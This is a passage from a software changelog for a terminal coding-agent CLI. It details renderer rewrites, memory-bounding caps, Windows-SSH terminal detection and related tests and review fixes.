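  startAgent: AgentLike,
  maxToolLoopIterations?: number,
): number | undefined {
  const manifestCap = admitted.get(startAgent)?.manifest.maxIterations;
  if (manifestCap === undefined) return maxToolLoopIterations;
  if (maxToolLoopIterations === undefined) return manifestCap;
  return Math.min(manifestCap, maxToolLoopIterations);
}
```

Reading the cap once from the entry agent matches the per-run scope note: agents reached through handoffs do not get their own lookup in this sketch.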
+
+ #### v0.7.31.2 review follow-up (commit `5456d9a`)
+
+ 5 documentation/comment-drift fixes from the post-commit independent review (no production behavior changes):
+
+ - `bounded-revise.ts` — comment claimed `AgentManifest` doesn't carry `maxIterations`; rewritten to explain v0.7.31.2 added the field + apply path + Runner.run wiring while clarifying that the invariant's own admit-time hook stays observe-only by design.
+ - `cap-016-mutation-reflection.contract.test.ts` — file header docstring's "six canonical lines" updated to the post-rewrite shape (header + senior-engineer rhetorical line + 3 self-review action lines).
+ - `benchmark/datasets/sa-mutation-reflection/README.md` — added a "Caveat on the safety-pass-rate claim" section: the simplified `SA_IDENTITY` prompt names the forbidden tools by name and the safety judges check for those same names, so 100% safety pass proves "system prompt + judge are in agreement", not that the new reflection text alone suppresses hallucination. cap-016 contract test (text doesn't seed forbidden names) is the load-bearing assurance.
+ - `docs/features/v0.7.31.md` §v0.7.31.2 — Fix #2 row now lists the 9 NEW tool names explicitly with a note that the v0.7.31.2 commit message body's per-name attribution was wrong (count is correct, attribution isn't); Fix #5 row gained a "Scope note" paragraph on per-run vs per-agent semantics.
+ - `runner.ts` (around line 490) — added the same scope-note inline at the iterationCap site, naming the change point a future v2 would modify (re-read `getAdmittedAgentBindings(handoffSignal.to)` at the handoff site) so reading the code alone tells you the cap is intentionally entry-agent-scoped, not an oversight.
+
+ ---
+
+ ## [0.7.30] - 2026-04-29
+
+ ### Theme
+
+ Cell-level diff renderer becomes the sole render path (FEATURE_057 Track F closes — legacy `log-update.js` factory + opt-out gate + 12 dead files retired, ~150 lines of `engine.js` rewritten to dispatch through `applyCellFrame` unconditionally). Bounded-memory runtime hardening lands as FEATURE_060 (Tier 1 caps `findLastFencedBlock` at a 128KB tail-window + transcript at `TRANSCRIPT_HARD_LINE_CAP = 100K` lines; Tier 2 ports claude-code's UUID-anchored 200-item cap + `useDeferredValue` + transcript-mode 30-message visible cap, restoring `kodax -c` resume responsiveness on Windows-SSH). Windows-SSH host detection (FEATURE_096, originally planned `v0.7.39`, migrated in) routes ConPTY hosts to a main-screen + spinner-preserved policy with the `KODAX_FULLSCREEN` three-state escape hatch. Three review-stage / hotfix patches before tag (Phase 6 cursor-visibility regression, `resetOutputTracking` not reseeding `prevFrame`, `outputToScreen` row-overflow crash) preserve byte-level invariants the legacy paths required.
+
+ ### Added
+
+ - **FEATURE_060 — Bounded-Memory Runtime + OOM Hardening (Tier 1 boundedness landed)**: Three concrete code changes plus 7 new regression tests pin the bounded-retention invariants the design called for. **Track 1 (managed-worker retention)**: `findLastFencedBlock` in `task-engine/_internal/managed-task/parse-helpers.ts` switched to a tail-only scan when text exceeds 128KB (`FENCED_BLOCK_SCAN_TAIL_THRESHOLD`). Managed-protocol fenced blocks are emitted at the end of LLM responses by convention (post-visible-text), so scanning the trailing 128KB instead of the full payload bounds regex cost on runaway/malformed LLM output (verbose-mode loops, repeated-injection attacks, malformed protocol streams). The `index` is mapped back to full-text coordinate space so callers using `text.slice(0, block.index)` continue to receive the correct visible-text prefix. **Track 2 (output-mode retention)**: removed the redundant `messages: [...result.messages]` spread at `runner-driven.ts:4747`. `result.messages` was already cloned at line 4676 from `runResult.messages`; spreading again here created a third full transcript copy in memory. `saveSessionSnapshot` doesn't mutate the passed array, so reference-passing is safe. **Track 3 (transcript boundedness)**: replaced `Number.POSITIVE_INFINITY` in `InkREPL.tsx:transcriptMaxLines` with `TRANSCRIPT_HARD_LINE_CAP = 100_000` (~10MB of materialized rows — orders of magnitude beyond any realistic interactive session). Added `THINKING_SHOW_ALL_HARD_CHAR_CAP = 200_000` per-block char cap that fires even when `showAllContent` is on (previously the show-all branch bypassed all caps and returned `item.text` directly). The thinking-case dispatch in `buildTranscriptRows` now routes show-all through `buildThinkingPreview` so the cap is consistently enforced; truncated content gets a hint pointing at session artifacts. 
**Track 4 (regression tests)**: 4 new tests in `parse-helpers.test.ts` (tail-window scan, full-text scan, oversized-prefix straddling, absent-block-in-tail-window) + 3 new tests in `transcript-layout.test.ts` (finite-cap export sanity, oversized thinking under show-all, under-cap thinking pass-through). **What's NOT in scope (with documented triggers)**: intra-round `runResult.messages` collapse — the substrate-level redesign required (autoReroute / sanitize-thinking / error-recovery middleware all reach into `result.messages` during a round) is profile-driven and deferred until a concrete heap-pressure repro warrants it; proper viewport virtualization (only materializing visible rows) is a separate refactor — the Tier 1 hard caps deliver the boundedness invariant Track 3 required without the architectural cost; headless `--print`-style output mode — KodaX has no equivalent CLI entry; deferred until that product surface exists. Tests: `packages/coding` + `packages/repl` 2,464 passing / 1 pre-existing Windows EPERM flake unrelated to this change. TypeScript clean. **FEATURE_060 Status: Completed (Tier 1).**
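The Track 1 tail-window scan, including the index mapping back to full-text coordinates, might look roughly like this. It is a simplified sketch: the regex, the `FencedBlock` return shape, and the function name are assumptions, the threshold is counted in UTF-16 code units rather than bytes, and a block that straddles the window boundary is not handled here.

```typescript
// Threshold value named in the entry above (counted in code units in this sketch).
const FENCED_BLOCK_SCAN_TAIL_THRESHOLD = 128 * 1024;

// Hypothetical return shape: start index in full-text coordinates plus the body.
interface FencedBlock {
  index: number;
  body: string;
}

function findLastFencedBlockSketch(
  text: string,
  threshold: number = FENCED_BLOCK_SCAN_TAIL_THRESHOLD,
): FencedBlock | undefined {
  // Scan only the trailing window when the text is larger than the threshold.
  const offset = text.length > threshold ? text.length - threshold : 0;
  const tail = text.slice(offset);
  const fence = /```[^\n]*\n([\s\S]*?)```/g;
  let last: FencedBlock | undefined;
  let match: RegExpExecArray | null;
  while ((match = fence.exec(tail)) !== null) {
    // Map the window-relative index back to full-text coordinates.
    last = { index: offset + match.index, body: match[1] ?? "" };
  }
  return last;
}
```

Because `index` is expressed against the full text, a caller doing `text.slice(0, block.index)` still gets the visible prefix even when only the tail was scanned.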
+
+ - **FEATURE_057 Track F Phase 6 — Legacy renderer retired (Track F closes)**: The `log-update.js` factory + `cursor-helpers.js` shim + `KODAX_TRACK_F` opt-out gate + `RenderOptions.incrementalRendering` typed shim are all gone. Cell-level diff renderer is now KodaX's only render path. **Phase 6 review-stage fixes (2026-04-29)**: post-implementation review caught two regressions that landed alongside the renderer retirement and were patched before release. **(1) Cursor visibility regression** — legacy `log-update.js`'s `createStandard` called `cliCursor.hide(stream)` on first render (default `showCursor=false`); Phase 6's deletion dropped this hide call, so the OS terminal cursor would otherwise blink at the bottom-left of the rendered UI (post-render cursor lands at `(0, screen.height)`). Fix: `engine.js` now emits a one-time `\x1b[?25l` write at the start of the first `onRender` (gated to non-CI / non-debug / non-screen-reader paths), paired with `App.js`'s existing useEffect cleanup `cliCursor.show(stdout)` on unmount. **(2) `resetOutputTracking` not reseeding `prevFrame`** — callers (`setShellMode` / `setAltScreenActive`) invoke the reset when alt-screen toggles or mouse-tracking flips happen outside the cell-renderer pipeline; without an `invalidateCellFrame()` call the next `applyCellFrame` would diff against a stale `prevFrame` and leave rows un-repainted. Fix: added `this.invalidateCellFrame()` to `resetOutputTracking`, symmetric with the other write-paths (`writeToStdout` / `writeToStderr` / `clear` / fullscreen-branch) that already invalidate after writing outside the cell pipeline. Two new regression tests in `engine.test.ts` pin both invariants (one-time cursor hide + prevFrame reseed on alt-screen toggle). 
**Files deleted (12 paths)**: `core/internals/log-update.js` (310 lines, engine-side legacy), `substrate/ink/log-update.js` (241 lines) + .map, `substrate/ink/cursor-helpers.js` (55 lines) + .map (only consumer was log-update), and four substrate-side dead files (`ink.js` 769 lines + .map, `render.js` + .map, `index.js` + .map, `instance.js` orphan vendored leftover) — production runtime never instantiated the substrate `Ink` class; everything went through `core/engine.js`. Phase 6a audit confirmed dead-code via `git grep -E "from.*substrate/ink['\"]"` returning zero hits across the repo. **engine.js surgery (~150 lines rewritten)**: dropped `import logUpdate`, `this.log = logUpdate.create(...)`, `throttledLog = throttle(...)`. `onRender`'s fullscreen branch `this.log.clearAndRender(fullFrameOutput)` → `stdout.write(eraseLines + fullFrameOutput)` as one atomic write (preserves FEATURE_096 Win10 OpenSSH/ConPTY fix); has-static branch `this.log.clear() + write(staticOutput) + this.log(outputToRender)` → `stdout.write(eraseLines + staticOutput) + invalidateCellFrame() + applyCellFrame(frame)`; legacy fallback `else if (output !== this.lastOutput || this.log.isCursorDirty())` deleted entirely (cell renderer always claims dispatch); `restoreLastOutput` rewritten to replay `prevFrame` via `cellLogUpdate.render(emptyFrame, prevFrame) + applyDiff` (cell-renderer-based restore keeps `prevFrame` consistent with screen state, no separate invalidate after); `writeToStdout` / `writeToStderr` / `clear()` / `resized()` / `setCursorPosition` / `resetOutputTracking` / `unmount` cleanup all dropped their `this.log.*` calls; `unmount`'s `throttledLog` flush + `this.log.done()` cleanup gone (cell renderer is stream-stateless). **renderer.js (substrate + core mirror)**: removed `isCellLevelRendererEnabled` import + the `if (isCellLevelRendererEnabled())` gate around `frame` construction — frame is now populated unconditionally on the non-screen-reader path. 
**cell-renderer.ts**: deleted `isCellLevelRendererEnabled` function + module JSDoc rewritten. **RenderOptions.incrementalRendering**: deleted from `tui/core/root.tsx` interface + two `incrementalRendering: false` defaults. **Tests**: 19-test delta (cell-renderer.test.ts gate suite + opt-out tests in both renderer.test.ts mirrors deleted, no longer a gate to test); engine.test.ts full rewrite (assertions migrated from `mocks.log.*` legacy mock to `mocks.stdoutWrite` actual user-visible behavior, fixtures use `createScreen` so `applyCellFrame` exercises the real cell renderer); 940/940 green in repl package, full repo regression: 367/373 files passing (6 pre-existing Windows EPERM/ENOENT temp-dir race flakes under high parallel load, all re-running clean in isolation). TypeScript build clean. **Risk eval**: deletion-heavy parts (substrate dead code, gate, option) are zero-risk; engine.js surgery preserves byte-level invariants the legacy paths required (single atomic write for SSH/ConPTY fullscreen, eraseLines+content for has-static, eraseLines+data+replay for writeToStdout). The `restoreLastOutput` rewrite is strictly more correct than legacy (cell renderer's diff is sound where log-update's `this.log(lastOutputToRender)` depended on bookkeeping consistency). No `KODAX_TRACK_F=off` opt-out anymore — users wanting to revert use a prior version. **Track F (cell-level diff renderer absorbing FEATURE_095) is complete.**
+
+ - **FEATURE_057 Track F Phase 5d + 5e — Cell renderer becomes default + stale SSH tune cleanup**: Phase 5d flips `isCellLevelRendererEnabled` from strict-equality `=== "on"` (opt-in) to strict-inequality `!== "off"` (opt-out). Cell renderer is now the default render path on every code path that previously honored the flag (`substrate/ink/{ink,renderer}.js` + `core/{engine.js,internals/renderer.js}`). Emergency rollback path remains a single env-var: `KODAX_TRACK_F=off` reverts to the legacy `log-update.js` factory and behavior is byte-identical to pre-Track-F (both renderers continue to be constructed unconditionally; only the dispatch branch differs). Strict-inequality matching (vs three-state truthy parsing) keeps the surface minimal for Phase 6's gate deletion. **Comment hygiene**: 5 stale "Initialized only when `KODAX_TRACK_F=on`" comments in `ink.js` / `engine.js` / `renderer.js` × 2 / `InkREPL.tsx` rewritten to reflect default-on semantics; the `incrementalRendering disabled - causes cursor positioning issues with custom TextInput` comment in `InkREPL.tsx` (a v0.7.0-era diagnosis of the exact symptom Track F's absolute-cursor diff resolves) replaced with a Phase 5d/6 forward note. **Phase 5e** was smaller than planned: the `KODAX_INCREMENTAL_RENDERING + sshDetected + maxFps: 15` interim SSH B-plan branch the design doc anticipated was never actually landed in code (verified via `git log --all -S` zero-hit), so 5e collapsed to documenting `RenderOptions.incrementalRendering` as a typed shim no-op under default-on (Phase 6 will delete the field with the legacy renderer). **Tests**: 4 flag-gate test files rewritten (cell-renderer + substrate renderer + core renderer + 6 strict-inequality value cases × 2 mirrors); full repl package 121 files / 959 tests green; TypeScript build clean. **Risk evaluation**: 5d is the user-facing behavior change — every Windows-Terminal / VS Code / POSIX / SSH user gets the new renderer on first v0.7.30 launch. 
Algorithm is structurally identical to CC reference (`c:/Works/claudecode/src/ink/log-update.ts`), burned in via 192 + 11 + 46 test fixtures across Phase 4 + 5 step 1 + 5 step 2.
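The difference between the opt-in and opt-out gates in Phase 5d comes down to one comparison. The sketch below takes the environment as a plain object (an assumption made so the example stays self-contained); the helper names are hypothetical, and only the `KODAX_TRACK_F` variable and the `=== "on"` / `!== "off"` comparisons come from the entry above.

```typescript
type Env = Record<string, string | undefined>;

// Pre-5d gate: opt-in, only the exact string "on" enables the cell renderer.
const isEnabledOptIn = (env: Env): boolean => env["KODAX_TRACK_F"] === "on";

// Phase 5d gate: opt-out, only the exact string "off" disables it.
const isEnabledOptOut = (env: Env): boolean => env["KODAX_TRACK_F"] !== "off";
```

With strict inequality, an unset variable or any value other than the literal `off` (for example `OFF` or `0`) leaves the cell renderer enabled, which keeps the gate trivial to delete later.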
+
+ - **FEATURE_057 Track F Phase 5 step 2 — First-render path CC-aligned (cleanup)**: Removes a small but principled deviation from CC reference. KodaX's `LogUpdate.render` carried a `prev.screen.height === 0` short-circuit that routed first-render through `renderFullFrame`, leaving the cursor mid-row at the last painted glyph; `apply-cell-frame.ts` then emitted an explicit post-write `\n` to realign the cursor for subsequent incremental moves. The `\n` was correct in normal cases but introduced a fullscreen-fit drift (Phase 4 review's MEDIUM-1) — patched then with a `screen.height < viewport.height` guard. Phase 5 step 2 deletes both the short-circuit and the explicit `\n` (and its guard). Empty-prev → non-empty-next now flows through the incremental path naturally: `diffEach` skips every coordinate (`growing && y >= 0`), `renderFrameSlice` paints all rows with row-final `\r\n`, `restoreCursor` is a structural no-op when `next.cursor.y === screen.height`. The algorithm is now a single shape regardless of whether `prev` was empty or populated. Mirrors `c:/Works/claudecode/src/ink/log-update.ts:123-466` exactly. Two tests rewritten in `cell-renderer.test.ts` (first-render now asserts `\r\n` emission via incremental, not `[{stdout:"ab"}]` from `renderFullFrame`); four tests rewritten in `apply-cell-frame.test.ts` (single applyDiff write asserted, viewport-fill guard test deleted as the guard itself is gone). 46/46 green for the touched files; full repl package: 953/953 green; no regressions. Side-task: added KNOWN_ISSUES #126 documenting tmux's default OSC 8 passthrough behavior and the `set -g allow-passthrough on` workaround (pre-existing condition affecting both legacy and cell renderers; recorded for user discoverability).
+
+ - **FEATURE_057 Track E — Output ownership & renderer boundary purification (first phase)**: 3 channel-mismatch `console.log` bugs in `InkREPL.tsx` (cancellation feedback, invocation error, Plan-Mode error) routed solely through the React history channel — previously they double-emitted via raw `console.log` which, with `patchConsole: false` (vendored substrate), bypassed Ink and landed in the wrong screen position. `TextInput.useTerminalWidth` now subscribes to the renderer-owned terminal size via `useTerminalSize()` instead of `process.stdout` directly, so the substrate's owned-stdout boundary holds when the renderer is attached to a non-default stream. Audit confirmed `AlternateScreen.tsx`, slash-command callbacks (captured by `executeCommand` wrapper at `InkREPL.tsx:6661-6679`), shutdown sequence (writes after `cleanup()` + `setRawMode(false)` + `stdin.pause()`), and pre-Ink boot writes were already correct. See `docs/features/v0.7.30.md` Track E status section for full audit log.
+
+ - **FEATURE_057 Track F Phase 5 step 1 — Engine-mirror integration: cell renderer wired into `core/engine.js` + `core/internals/{output,renderer}.js` (still flag-gated)**: Phase 5 step 1 mirrors the Phase 4 wiring into KodaX's engine-side renderer (the "core mirror" of the vendored ink substrate; design doc requires both renderers to be wired in lockstep). Three sub-steps: **5a** — extracted `Output.getGrid()` in `core/internals/output.js` (mirrors Phase 4a refactor on substrate). **5b** — added optional 3rd `terminalSize` param + `frame` return field to `core/internals/renderer.js`, importing `isCellLevelRendererEnabled` + `outputToScreen` from `../../substrate/ink/` (cross-directory import; the cell-renderer logic lives canonically in substrate/ink — direction is one-way, preserving acyclicity). 11 mirror tests in `core/internals/renderer.test.ts`. **5c** — wired `cellLogUpdate` + `applyCellFrame` + `invalidateCellFrame` into `core/engine.js` (constructor instantiates when flag on; `onRender()` branches before legacy `throttledLog`; `resized()` / `writeToStdout()` / `writeToStderr()` / `clear()` reseed `prevFrame` on legacy-path side effects). KodaX-specific deviation: introduced `OutputLike` duck-typed interface in `output-to-screen.ts` (read-only `width` / `height` / `getGrid()`) so both `substrate/ink/output.js` and `core/internals/output.js` Output instances satisfy the parameter type without `// @ts-ignore` — fixes the previous type lie identified in code review (MEDIUM-1). 
**Code-review verdict: WARNING (0 CRITICAL, 1 HIGH, 3 MEDIUM, 1 LOW)** — 4 of 5 fixed before merge: HIGH-6 (`invalidateCellFrame` missing on `!shouldRestoreManagedShellAfterExternalWrite()` early-return paths) added the call; MEDIUM-1 (cross-directory type lie) → `OutputLike`; MEDIUM-3 (fullscreen branch returned without invalidating prevFrame, drifting on alt-screen exit) → `invalidateCellFrame()` before fullscreen early-return; MEDIUM-5 (no focused engine.onRender dispatch tests) deferred to Phase 5d with TODO comment (covered indirectly via shared `applyCellFrame.test.ts`); LOW-4 (mid-session dual-renderer flag-flip safety) confirmed safe. **Phase 5d (default flip) + 5e (SSH tune removal) deliberately deferred** for explicit user authorization — both are user-facing behavior changes (existing users would see cell renderer engage by default; FEATURE_096 SSH tune `KODAX_INCREMENTAL_RENDERING` becomes obsolete once cell renderer ships). 11 new tests; combined Phase 1-5-step-1 substrate + core test count: **203 tests**. Repo full suite: 372 files / 3784 tests + 23 todo, zero regressions. TypeScript build clean.
+
+ - **FEATURE_057 Track F Phase 4 — Substrate integration: cell renderer wired into `renderer.js` + `ink.js` (still flag-gated)**: Phase 4 closes the substrate-integration risk. Three sub-phases: **4a** ships two new pure modules — `apply-diff.ts` (Patch → terminal-bytes serializer with single-`stream.write` invariant; empty diff skips the write entirely) and `output-to-screen.ts` (vendored `Output` 2D `StyledChar` grid → KodaX `Screen`, with SGR codes landing in `cell.style`, OSC 8 hyperlinks extracted into `cell.hyperlink`, and SpacerTail recreation for wide-char tails). **4a vendored refactor**: `Output.get()` operation-replay loop extracted into a new `Output.getGrid()` method; `get()` now wraps `getGrid()`. Both render paths share the same replay logic so the cell grid stays consistent with the legacy string output. **4b** modifies `renderer.js` to accept an optional 3rd `terminalSize` parameter (so `frame.viewport` reflects the real TTY dimensions, not yoga-computed content size) and returns an additional `frame` field, populated only when `KODAX_TRACK_F=on` and the screen-reader pipeline is off. Legacy `output` / `outputHeight` / `staticOutput` fields remain populated regardless of flag — toggling the flag does not change legacy-path bytes. **4c** wires the cell path into `ink.js`'s `onRender()` hot path: a new branch in the simple-incremental tail (just before `throttledLog`) routes through `applyCellFrame` (a free function in `apply-cell-frame.ts` for unit-testability without React) when the flag is on. Constructor instantiates `cellLogUpdate` + seeds `prevFrame = emptyFrame(rows, cols)` only when the flag is on; mid-session flag flips are explicitly undefined. `resized()` reseeds `prevFrame` with `emptyFrame(rows, currentWidth)` on width-shrink so the next render goes through the full-frame paint path (mirrors the legacy `this.log.clear()` + `lastOutput = ''` pattern). 
Other `onRender` branches (debug / CI / screen-reader / fullscreen / has-static) are deliberately untouched in Phase 4 — Phase 5 expands cell coverage. KodaX-specific deviation: explicit first-render `\n` post-write at the call site (in `apply-cell-frame.ts`) realigns terminal cursor with `frame.cursor = (0, screen.height)` after `renderFullFrame` (which lands cursor at end-of-last-line); CC reference handles this implicitly inside its first-render path. **Code-review verdict: WARNING (0 CRITICAL, 0 HIGH, 2 MEDIUM, 2 LOW)** — all four addressed before merge: MEDIUM 1 (fullscreen first-render `\n` would scroll the terminal and drift `prevFrame.cursor`) gated with `frame.screen.height < frame.viewport.height` guard; MEDIUM 2 (`writeToStdout`/`writeToStderr`/`clear()` legacy-path writes leave `prevFrame` stale) added `invalidateCellFrame()` helper called after each of the three legacy call sites to reseed `prevFrame = emptyFrame(...)`; LOW 1+2 inaccurate comments fixed. 45 new substrate/ink tests (16 apply-diff + 10 output-to-screen + 11 renderer + 8 apply-cell-frame, the last includes the 2 viewport-fill tests added during the MEDIUM-1 fix); combined Phase 1-4 substrate test count: **192 tests**. Repo full suite: 372 files / 3773 tests + 23 todo, zero regressions caused by Phase 4 (1 known-flaky `tests/sa-refactor-goldens/selection.test.ts` real-corpus parsing test occasionally times out at 5s on slow Windows filesystem; pre-existing). TypeScript build clean.
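The single-write invariant attributed to `apply-diff.ts` can be illustrated with a few lines. This is only a sketch: the `Patch` shape here (a patch that already carries its terminal bytes) and the `WritableLike` interface are hypothetical simplifications, not the module's actual types.

```typescript
// Hypothetical patch shape: each patch already carries its terminal bytes.
interface Patch {
  bytes: string;
}
// Minimal stream surface needed by the sketch.
interface WritableLike {
  write(chunk: string): unknown;
}

// Serializes all patches into one string and issues at most one write.
// Returns the number of writes performed (0 or 1).
function applyDiffSketch(stream: WritableLike, diff: readonly Patch[]): number {
  if (diff.length === 0) return 0; // empty diff: skip the write entirely
  stream.write(diff.map((p) => p.bytes).join(""));
  return 1;
}
```

Batching everything into one `write` call means the terminal never observes a half-applied frame between two separate writes.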
+
+ - **FEATURE_057 Track F Phase 1 — Cell-level diff renderer typed skeleton (flag-gated)**: First of 6 phases for the cell-level diff renderer rewrite. Five new files under `packages/repl/src/tui/substrate/ink/`: `csi.ts` (pure CSI primitives), `osc.ts` (OSC 8 hyperlinks), `cell-screen.ts` (immutable cell-grid `Screen` + `cellAt` / `diffEach` / `shiftRows`), `frame.ts` (`Frame` / `Diff` / `Patch` / `shouldClearScreen`), `cell-renderer.ts` (`LogUpdate` class stub + `KODAX_TRACK_F=on` flag gate). Stub `render(prev, next)` returns empty diff so the flag-on path is deliberately blank (diagnosable) rather than partially rendered (would corrupt terminal). Zero behavioral change — legacy `log-update.js` remains the production renderer until Phase 6. 46 new unit tests pin the type contracts (csi: 12, osc: 6, cell-screen: 16, frame: 6, cell-renderer: 6). Naming: new file is `cell-renderer.ts` not `log-update.ts` because the legacy `log-update.js` co-exists in the same directory until retirement; TypeScript module resolution would conflict on shared basename.
+
+ - **FEATURE_057 Track F Phase 3 (3b + 3c) — Algorithm decisions + incremental main loop (still flag-gated)**: Phase 3 closes the algorithmic core of the cell-level renderer. **3b** introduces a new `viewport-state.ts` file with three pure decision functions: `computeViewportState(prev, next)` returns `{viewportY, cursorAtBottom, growing, shrinking, prevHadScrollback, nextFitsViewport}` with formulas annotated to CC reference lines (architect's "build viewportY fixtures before implementing" discipline followed); `shouldFullReset(prev, next)` returns the 4-case full-reset decision (resize / shrink-from-above-viewport / scrollback-cell-change / linesToClear-exceeds-viewport) with optional `trigger: {y, prevLine, nextLine}` debug info on scrollback hits; `shouldSkipDiff(removed, added, isEmptyAdded)` is the per-cell skip predicate (SpacerTail / empty-no-removed). 32 fixtures hand-traced against CC arithmetic. **3c** adds `renderIncremental(prev, next): Diff` to `cell-renderer.ts` — the main orchestrator that composes Phase 3a primitives with Phase 3b decisions: shrink → diffEach walk → grow rows → cursor restore. `LogUpdate.render()` routing now has 4 paths (non-TTY / first-render / full-reset / incremental). Two extracted helpers: `emitPatches` (zero-delta patch sequence) and `resetStyleAndHyperlink` (tracker reset). 5 integration tests cover steady-state cell change, growing/shrinking frames, resize reset, and scrollback-cell-change reset. Combined Phase 1-3c substrate test count: 143 tests. KodaX-specific deviations from CC: no `clearTerminal.debug` field (computed but not threaded through Patch shape yet), no `altScreen` / `decstbmSafe` parameters (DECSTBM optimization out-of-scope per design), no frame-timing instrumentation.
+
+ - **FEATURE_057 Track F Phase 3a — Cell-level write/cursor primitives (still flag-gated)**: Phase 3 was originally one phase; split into 3a (mechanical primitive ports, low risk) and 3b (algorithmic main loop, high risk) for independent review boundaries. 3a adds `writeCellWithStyleStr` (cell write with viewport-edge wide-char skip + wcwidth compensation + pending-wrap state), `moveCursorTo` (cursor positioning with `\r` reset for cross-row / pending-wrap cases), `renderFrameSlice` (row-range render using LF for cursor advancement so the viewport scrolls at the bottom margin, with unstyled-empty-cell skip), `readLine` (line read-back for `triggerY` debug info), `fullResetSequence_CAUSES_FLICKER` (full-screen reset fallback emitting `clearTerminal` + fresh full render). All primitives route mutation through `VirtualScreen.txn` (correctness + encapsulation > one closure-tuple-delta allocation per cell; Phase 6 may inline if profiling shows). 19 new tests pin the byte sequences (total 99 substrate tests). Zero regressions.
+
+ - **FEATURE_057 Track F Phase 2 — `renderFullFrame` + `VirtualScreen` skeleton + transition helpers (still flag-gated)**: Adds the first real rendering logic. `renderFullFrame(frame: Frame): Diff` walks the cell grid row-by-row, skips `SpacerTail` cells, emits hyperlink/SGR style transitions inline, returns a single `stdout` patch with lines joined by `\n` and trailing whitespace trimmed per line. `LogUpdate.render(prev, next)` now routes non-TTY and first-render (`prev.screen.height === 0`) to `renderFullFrame`; incremental case still returns `[]` (Phase 3 fills). New pure helpers: `transitionStyle` and `transitionHyperlink` return `{ patches, current }` — explicitly NOT accumulator-mutation style (Claude Code's reference mutates a passed-in array; KodaX's CRITICAL immutability rule forbids that pattern). `needsWidthCompensation(char)` flags emojis where terminal wcwidth tables disagree with Unicode (U+1FA70-1FAFF, U+1FB00-1FBFF blocks; multi-codepoint graphemes containing VS16). `VirtualScreen` class skeleton (Phase 3 cursor-state machine) ships with `cursor: Readonly<Point>` externally + `_cursorMut` internal handle so observers can't accidentally write to it from outside the class. New `SGR_RESET` constant in `csi.ts` (`\x1b[0m`). +34 tests in cell-renderer.test.ts (total 80 substrate tests). Code-review found 2 HIGH, 3 MEDIUM, 2 LOW — all actionable items addressed before merge (notably H2 immutability violation in `transition*` helpers refactored to pure functions).
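The `{ patches, current }` return style of the transition helpers can be sketched as a pure function. The representation below is an assumption made for illustration: a style is modelled as its raw SGR sequence (with `""` meaning unstyled), and every change resets before applying the next style, which is simpler than what a real renderer would likely emit.

```typescript
const SGR_RESET = "\x1b[0m";

interface Transition {
  patches: readonly string[];
  current: string;
}

// Pure transition: returns the escape sequences to emit plus the new tracked
// style, instead of pushing into a caller-owned array.
function transitionStyleSketch(current: string, next: string): Transition {
  if (current === next) return { patches: [], current };
  // Assumption: reset first, then apply the next style if there is one.
  const patches = next === "" ? [SGR_RESET] : [SGR_RESET, next];
  return { patches, current: next };
}
```

The caller threads `current` through successive calls and concatenates the returned `patches` itself, so no shared accumulator is mutated.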
479
+
480
+ - **FEATURE_096 — Windows-SSH ConPTY Host Auto-Downgrade to Main-Screen Policy** (originally planned `v0.7.39`, migrated into `v0.7.30` 2026-04-28 to land alongside FEATURE_057). New `remote_conpty_host` host profile in `TerminalRenderHost` union that detects `platform=win32 + (SSH_CONNECTION | SSH_CLIENT | SSH_TTY)` and routes the affected sessions to a main-screen policy (`enabled:false`, `mouseWheel/Clicks:false`, `streamingPreview:false`, `transcriptSpinnerAnimation:true`). Solves two layered platform issues: (1) Windows OpenSSH Server's ConPTY layer silently consumes VT mouse-tracking byte sequences before they reach the child process stdin, so KodaX's normal fullscreen + alt-screen path leaves users with broken mouse-wheel scroll while alt-screen bypasses the terminal's native scrollback; (2) Windows conhost's `SetConsoleCursorPosition` cursor-up viewport yank bug ([microsoft/terminal#14774](https://github.com/microsoft/terminal/issues/14774)) — when string-level `log-update` emits `cursor up + eraseLines` per frame and the cursor crosses the viewport's top edge, conhost yanks the user's view to the top of the scrollback buffer mid-stream, surfacing as the "repeated re-rendering" symptom. Affected users now keep the spinner + Banner + StatusBar + PromptFooter + BackgroundTaskBar through main-screen Ink rendering; live token streaming is intentionally disabled at main-screen (matches Claude Code's `hasCursorUpViewportYankBug`-gated `showStreamingText` policy in `c:/Works/claudecode/src/screens/REPL.tsx:1463`) and re-enabled once 057 Track F's absolute-cursor cell-level diff renderer lands. xtermjs check (VS Code Remote-SSH) runs first so VS Code Remote-SSH on Windows is not falsely downgraded.
481
+ - **`KODAX_FULLSCREEN` user-level escape hatch** (FEATURE_096): a single three-state variable, `KODAX_FULLSCREEN={1|0|unset}`, lets users override the automatic fullscreen decision when the auto-downgrade judgement is wrong. Leaving it unset keeps the automatic behaviour. `=1` short-circuits at the detect layer (Windows-SSH no longer routes to `remote_conpty_host`; it falls through to its underlying host classification, typically `degraded_vt`, and gets fullscreen + mouse). `=0` forces every host into the main-screen + mouse-off + streaming/spinner-preserved policy regardless of detected host (for users who explicitly prefer terminal-native scroll). The variable is named after the actual fullscreen decision rather than mouse control because mouse failure is a side-effect of leaving fullscreen, not the user's intent. An earlier `KODAX_DISABLE_MOUSE` design contained a dead state where `=1` meant "keep fullscreen but disable mouse": alt-screen blocks terminal scrollback while the app no longer receives wheel events, so users with `=1` had no way to scroll at all.
482
+
483
+ - **FEATURE_060 Tier 2 — SSH transcript-resume perf (UUID-anchored 200-cap + useDeferredValue + transcript-mode 30-cap)** (commit `89c7dbb`): user-reported lag on `kodax -c` of long sessions over Windows-SSH — input took seconds to register, spinner refresh stuttered, entire history materialized untruncated. Root cause: KodaX wrapped Ink's `<Static>` around historical items (paint-once-to-scrollback semantics), but the one-time first-paint of N items is one giant `stream.write` to SSH/ConPTY; every spinner tick / keystroke triggered a full `buildTranscriptRenderModel` rebuild scaling O(N) on local CPU. KodaX had no count-based cap (only `MAX_VISIBLE_ROUNDS = 20` UX preference + `TRANSCRIPT_HARD_LINE_CAP = 100K` Tier 1 OOM safety). Three sub-changes mirror claude-code's production-tested non-virtualized pattern: (1) `computeTranscriptCapStart` + `TRANSCRIPT_RENDER_CAP = 200` + `TRANSCRIPT_RENDER_CAP_STEP = 50` UUID-anchored slice in `transcript-layout.ts` (immune to `collapseToolCalls` regrouping id churn, CC-1174; advances in 50-item steps to avoid per-append static block re-paint, CC-941; fallback clamps stored idx against `length - cap`); (2) `useDeferredValue` on `displayHistory` in `InkREPL.tsx` so spinner ticks + keystrokes get React's high-priority schedule while the heavy render-model rebuild runs on the low-priority track (mirrors CC's REPL.tsx:1318); (3) `TRANSCRIPT_MODE_VISIBLE_MESSAGES = 30` in transcript-mode when `showAllInTranscript` is off so the surface lands close to the active turn instead of 